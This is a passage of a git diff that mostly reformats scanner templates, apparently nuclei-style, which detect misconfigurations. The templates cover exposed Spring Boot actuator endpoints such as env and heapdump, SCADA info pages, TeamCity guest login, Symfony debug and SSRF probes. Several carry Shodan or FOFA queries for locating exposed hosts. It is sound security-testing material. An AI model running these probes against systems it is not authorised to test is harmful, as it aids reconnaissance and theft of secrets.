metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Sonarqube" fofa-query: app="sonarQube-代码管理" tags: sonarqube,exposure,misconfig diff --git a/http/misconfiguration/sonarqube-public-projects.yaml b/http/misconfiguration/sonarqube-public-projects.yaml index 0917dcb286..e8923c5388 100644 --- a/http/misconfiguration/sonarqube-public-projects.yaml +++ b/http/misconfiguration/sonarqube-public-projects.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true - tags: sonarqube,misconfig metadata: max-request: 1 + tags: sonarqube,misconfig http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: status status: - 200 @@ -28,4 +27,4 @@ http: - '"items":' - '"more":' part: body - condition: and \ No newline at end of file + condition: and diff --git a/http/misconfiguration/sony-bravia-disclosure.yaml b/http/misconfiguration/sony-bravia-disclosure.yaml index 1c4b90e8f2..01cadd3bb0 100644 --- a/http/misconfiguration/sony-bravia-disclosure.yaml +++ b/http/misconfiguration/sony-bravia-disclosure.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt - tags: misconfig,sony,unauth,exposure metadata: max-request: 1 + tags: misconfig,sony,unauth,exposure http: - method: GET diff --git a/http/misconfiguration/sound4-directory-listing.yaml b/http/misconfiguration/sound4-directory-listing.yaml index a411eb1aca..c7e26530cb 100644 --- a/http/misconfiguration/sound4-directory-listing.yaml +++ b/http/misconfiguration/sound4-directory-listing.yaml @@ -10,8 +10,8 @@ info: - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"SOUND4" tags: misconfig,listing,sound4,disclosure,packetstorm diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index 1771527325..44fcdbae3d 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -7,25 +7,28 @@ info: description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. reference: - https://spidercontrol.net/spidercontrol-inside/ - tags: spidercontrol,scada,exposure,misconfig metadata: max-request: 1 + tags: spidercontrol,scada,exposure,misconfig http: - method: GET path: - '{{BaseURL}}/cgi-bin/GetSrvInfo.exe' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "powered by SpiderControl" - "LSWEBSERVER" - "SCWEBSERVICES" condition: and + extractors: - type: kval part: header diff --git a/http/misconfiguration/springboot/spring-eureka.yaml b/http/misconfiguration/springboot/spring-eureka.yaml index 5e4a3306c2..d4e9b79a6f 100644 --- a/http/misconfiguration/springboot/spring-eureka.yaml +++ b/http/misconfiguration/springboot/spring-eureka.yaml @@ -5,8 +5,8 @@ info: author: tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure,eureka diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml index 0c8fed361c..2fd097b3be 100644 --- a/http/misconfiguration/springboot/springboot-auditevents.yaml +++ b/http/misconfiguration/springboot/springboot-auditevents.yaml @@ -9,11 +9,11 @@ info: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/actuator/auditevents" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index 234ebfacb7..b586c812c9 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/autoconfig" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index bdca65d657..81b881ceb7 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -5,9 +5,9 @@ info: author: ajaysenr severity: low description: Displays a complete list of all the Spring beans in the application - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/beans" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-caches.yaml b/http/misconfiguration/springboot/springboot-caches.yaml index 2c11de9e0b..b363b8444d 100644 --- a/http/misconfiguration/springboot/springboot-caches.yaml +++ b/http/misconfiguration/springboot/springboot-caches.yaml @@ -8,8 +8,8 @@ info: reference: - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#caches metadata: - max-request: 2 verified: true + max-request: 2 tags: misconfig,springboot,exposure http: @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/caches" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-conditions.yaml b/http/misconfiguration/springboot/springboot-conditions.yaml index 0c9b63c4ff..bdf22b7b37 100644 --- a/http/misconfiguration/springboot/springboot-conditions.yaml +++ b/http/misconfiguration/springboot/springboot-conditions.yaml @@ -7,8 +7,8 @@ info: reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/conditions" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index 65df3dff42..8b319450b0 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -5,9 +5,9 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Sensitive environment variables may not be masked - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/configprops" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -25,9 +26,11 @@ http: - "beans" - "contexts" condition: and + - type: status status: - 200 + - type: word words: - "application/json" diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index 5719fb3b15..32ea6d2858 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low description: Performs a thread dump - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/dump" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-env.yaml b/http/misconfiguration/springboot/springboot-env.yaml index 2f22ea0929..1af34a2b20 100644 --- a/http/misconfiguration/springboot/springboot-env.yaml +++ b/http/misconfiguration/springboot/springboot-env.yaml @@ -5,9 +5,9 @@ info: author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish severity: low description: Sensitive environment variables may not be masked - tags: misconfig,springboot,env,exposure metadata: max-request: 4 + tags: misconfig,springboot,env,exposure http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/message-api/actuator/env" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-features.yaml b/http/misconfiguration/springboot/springboot-features.yaml index b937281862..11cce874e0 100644 --- a/http/misconfiguration/springboot/springboot-features.yaml +++ b/http/misconfiguration/springboot/springboot-features.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/actuator/features" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-flyway.yaml b/http/misconfiguration/springboot/springboot-flyway.yaml index 9bd6ab4c88..f441a4c2d7 100644 --- a/http/misconfiguration/springboot/springboot-flyway.yaml +++ b/http/misconfiguration/springboot/springboot-flyway.yaml @@ -8,8 +8,8 @@ info: reference: - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#flyway metadata: - max-request: 2 verified: true + max-request: 2 tags: misconfig,springboot,exposure,flyway http: @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/flyway" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index ce528c8ca3..0466185c41 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -7,9 +7,9 @@ info: description: Sensitive environment variables may not be masked reference: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/actuator/gateway/routes" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index 468d1ad59e..6581bac77f 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -7,11 +7,11 @@ info: description: Spring Boot Health Actuator panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/actuator/health" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index e17e449dc0..a47a572c72 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -11,7 +11,6 @@ info: metadata: max-request: 3 tags: springboot,exposure,misconfig - variables: str: "{{rand_base(6)}}" @@ -20,16 +19,15 @@ http: - | GET /{{str}} HTTP/1.1 Host: {{Hostname}} - - | GET /heapdump HTTP/1.1 Host: {{Hostname}} - - | GET /actuator/heapdump HTTP/1.1 Host: {{Hostname}} max-size: 2097152 # 2MB - Max Size to read from server response + matchers-condition: or matchers: - type: dsl diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index 795b25dcca..1ef409540f 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,9 +5,9 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/httptrace" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-info.yaml b/http/misconfiguration/springboot/springboot-info.yaml index 20720ce737..9185244065 100644 --- a/http/misconfiguration/springboot/springboot-info.yaml +++ b/http/misconfiguration/springboot/springboot-info.yaml @@ -7,11 +7,11 @@ info: description: Spring Boot information panel displaying app name, version information, and other values was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: springboot,misconfig metadata: max-request: 2 + tags: springboot,misconfig http: - method: GET @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/actuator/info" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-jolokia.yaml b/http/misconfiguration/springboot/springboot-jolokia.yaml index 6fb5be4816..bc56fa6014 100644 --- a/http/misconfiguration/springboot/springboot-jolokia.yaml +++ b/http/misconfiguration/springboot/springboot-jolokia.yaml @@ -7,8 +7,8 @@ info: reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/jolokia" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-liquidbase.yaml b/http/misconfiguration/springboot/springboot-liquidbase.yaml index 3f335e23e4..2df95aa835 100644 --- a/http/misconfiguration/springboot/springboot-liquidbase.yaml +++ b/http/misconfiguration/springboot/springboot-liquidbase.yaml @@ -8,8 +8,8 @@ info: reference: - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#liquibase metadata: - max-request: 2 verified: true + max-request: 2 tags: misconfig,springboot,exposure,liquibase http: @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/liquibase" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-logfile.yaml b/http/misconfiguration/springboot/springboot-logfile.yaml index d7076448f0..4aafaf852a 100644 --- a/http/misconfiguration/springboot/springboot-logfile.yaml +++ b/http/misconfiguration/springboot/springboot-logfile.yaml @@ -7,8 +7,8 @@ info: reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/actuators/logfile" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-loggerconfig.yaml b/http/misconfiguration/springboot/springboot-loggerconfig.yaml index c2348f4112..0ecbab3e04 100644 --- a/http/misconfiguration/springboot/springboot-loggerconfig.yaml +++ b/http/misconfiguration/springboot/springboot-loggerconfig.yaml @@ -9,11 +9,11 @@ info: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/actuator/loggingConfig" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 85408ca4ac..81c887a456 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,9 +4,9 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -15,6 +15,7 @@ http: - "{{BaseURL}}/actuator/loggers" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index 17f602c958..4bd96ac020 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -5,9 +5,9 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/mappings" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index 4920f564f2..aa81b133e0 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low description: Additional routes may be displayed - tags: springboot,exposure,misconfig metadata: max-request: 2 + tags: springboot,exposure,misconfig http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/actuator/metrics" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml index c811a7b78c..052362ae8b 100644 --- a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml +++ b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml @@ -9,11 +9,11 @@ info: - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#scheduled-tasks classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 tags: misconfig,springboot,exposure http: @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/actuator/scheduledtasks" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-status.yaml b/http/misconfiguration/springboot/springboot-status.yaml index 92ff18dbf6..d044360015 100644 --- a/http/misconfiguration/springboot/springboot-status.yaml +++ b/http/misconfiguration/springboot/springboot-status.yaml @@ -7,11 +7,11 @@ info: description: Spring Boot Status Actuator panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eureka" tags: misconfig,springboot,exposure @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/actuator/status" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-threaddump.yaml b/http/misconfiguration/springboot/springboot-threaddump.yaml index 9aa50b237d..08623dcaaa 100644 --- a/http/misconfiguration/springboot/springboot-threaddump.yaml +++ b/http/misconfiguration/springboot/springboot-threaddump.yaml @@ -7,9 +7,9 @@ info: description: The threaddump endpoint provides a thread dump from the application's JVM. reference: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump - tags: springboot,misconfig metadata: max-request: 2 + tags: springboot,misconfig http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/actuator/threaddump" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/springboot/springboot-trace.yaml b/http/misconfiguration/springboot/springboot-trace.yaml index f7751037cf..fc7158d2fe 100644 --- a/http/misconfiguration/springboot/springboot-trace.yaml +++ b/http/misconfiguration/springboot/springboot-trace.yaml @@ -5,9 +5,9 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: misconfig,springboot,exposure metadata: max-request: 1 + tags: misconfig,springboot,exposure http: - method: GET diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 88fa143a35..0ebe552fb9 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -7,8 +7,8 @@ info: reference: - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16 metadata: - max-request: 2 verified: true + max-request: 2 google-query: inurl:"/Reports/Pages/Folder.aspx" tags: misconfig,sql,report,exposure @@ -17,7 +17,6 @@ http: - | GET /Reports/Pages/Folder.aspx HTTP/1.1 Host: {{Hostname}} - - | GET /ReportServer/Pages/Folder.aspx HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/ssrf-via-oauth-misconfig.yaml b/http/misconfiguration/ssrf-via-oauth-misconfig.yaml index b1526c7ba8..167d979513 100644 --- a/http/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/http/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -7,9 +7,9 @@ info: description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. reference: - https://portswigger.net/research/hidden-oauth-attack-vectors - tags: misconfig,oast,oauth,ssrf metadata: max-request: 1 + tags: misconfig,oast,oauth,ssrf,intrusive http: - raw: @@ -31,6 +31,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index 56d225cb00..147f9182fc 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -10,8 +10,8 @@ info: reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Struts Problem Report" tags: apache,struts,ognl,panel,misconfig diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml index 078af6a55e..3632bb8ed1 100644 --- a/http/misconfiguration/symfony-debug.yaml +++ b/http/misconfiguration/symfony-debug.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/synacktiv/eos metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"symfony Profiler" tags: symfony,debug,misconfig diff --git a/http/misconfiguration/symfony-fosjrouting-bundle.yaml b/http/misconfiguration/symfony-fosjrouting-bundle.yaml index d1f8702f3c..74085264e8 100644 --- a/http/misconfiguration/symfony-fosjrouting-bundle.yaml +++ b/http/misconfiguration/symfony-fosjrouting-bundle.yaml @@ -8,8 +8,8 @@ info: - https://packagist.org/packages/friendsofsymfony/jsrouting-bundle - https://github.com/FriendsOfSymfony/FOSJsRoutingBundle metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"symfony Profiler" tags: misconfig,symfony diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml index e68661ad72..70e2bce826 100644 --- a/http/misconfiguration/symfony-fragment.yaml +++ b/http/misconfiguration/symfony-fragment.yaml @@ -12,9 +12,9 @@ info: - https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5 - https://github.com/ambionics/symfony-exploits metadata: + verified: true max-request: 1 shodan-query: http.html:"symfony Profiler" - verified: true tags: config,exposure,symfony,misconfig http: diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 74241d85e0..49724fb301 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -7,8 +7,8 @@ info: reference: - https://syncthing.net/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:'ng-app="syncthing"' tags: misconfig,syncthing,exposure @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/system-properties-exposure.yaml b/http/misconfiguration/system-properties-exposure.yaml index 10f4948bfc..7db5c060c9 100644 --- a/http/misconfiguration/system-properties-exposure.yaml +++ b/http/misconfiguration/system-properties-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"System Properties" tags: misconfig,system,exposure diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index e60c234a24..c9928b60ac 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/arendst/Tasmota metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tasmota" tags: misconfig,tasmota,exposure,config diff --git a/http/misconfiguration/tcpconfig.yaml b/http/misconfiguration/tcpconfig.yaml index 1bbf96bc97..2f4ceea13e 100644 --- a/http/misconfiguration/tcpconfig.yaml +++ b/http/misconfiguration/tcpconfig.yaml @@ -5,16 +5,16 @@ info: author: dhiyaneshDK severity: medium description: TCP/IP configuration information was detected. + reference: + - https://www.rockwellautomation.com/ + - https://www.exploit-db.com/ghdb/6782 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://www.rockwellautomation.com/ - - https://www.exploit-db.com/ghdb/6782 - tags: config,edb,logs,misconfig metadata: max-request: 1 + tags: config,edb,logs,misconfig http: - method: GET diff --git a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml index 44fb30b48b..ba6d1ba2e1 100644 --- a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml @@ -11,11 +11,11 @@ info: - https://www.jetbrains.com/help/teamcity/guest-user.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 7.30 + cvss-score: 7.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"TeamCity" tags: misconfig,teamcity,jetbrains diff --git a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml index 274912433e..8c13bab84b 100644 --- a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml @@ -10,13 +10,13 @@ info: - https://ph33r.medium.com/misconfig-in-teamcity-panel-lead-to-auth-bypass-in-apache-org-0day-146f6a1a4e2b classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 7.30 + cvss-score: 7.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"TeamCity" - tags: misconfig,auth-bypass,teamcity,jetbrains + tags: misconfig,auth-bypass,teamcity,jetbrains,intrusive http: - raw: diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml index b6afb557b2..48b16036ea 100644 --- a/http/misconfiguration/teslamate-unauth-access.yaml +++ b/http/misconfiguration/teslamate-unauth-access.yaml @@ -7,8 +7,8 @@ info: description: | A misconfig in Teslamate allows unauthorized access to /settings endpoint. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1478287554 fofa-query: title="teslamate" tags: misconfig,teslamate,unauth diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index a45e16ea17..4204aa704f 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -5,8 +5,8 @@ info: author: j4vaovo severity: medium metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="ThinkPHP" && title="System Error" tags: thinkphp,misconfig,exposure diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml index 5bb5eeee62..13bd081c05 100644 --- a/http/misconfiguration/tls-sni-proxy.yaml +++ b/http/misconfiguration/tls-sni-proxy.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/ - https://www.bamsoftware.com/computers/sniproxy/ - tags: ssrf,oast,tls,sni,proxy metadata: max-request: 1 + tags: ssrf,oast,tls,sni,proxy http: - raw: @@ -22,4 +22,4 @@ http: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" diff --git a/http/misconfiguration/tomcat-cookie-exposed.yaml b/http/misconfiguration/tomcat-cookie-exposed.yaml index 56e1118f57..b413b0e2bc 100644 --- a/http/misconfiguration/tomcat-cookie-exposed.yaml +++ b/http/misconfiguration/tomcat-cookie-exposed.yaml @@ -7,8 +7,8 @@ info: reference: - https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20 metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,apache,tomcat,exposure http: diff --git a/http/misconfiguration/tomcat-scripts.yaml b/http/misconfiguration/tomcat-scripts.yaml index 087c7ba3ce..99a4806374 100644 --- a/http/misconfiguration/tomcat-scripts.yaml +++ b/http/misconfiguration/tomcat-scripts.yaml @@ -10,11 +10,11 @@ info: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/ classification: 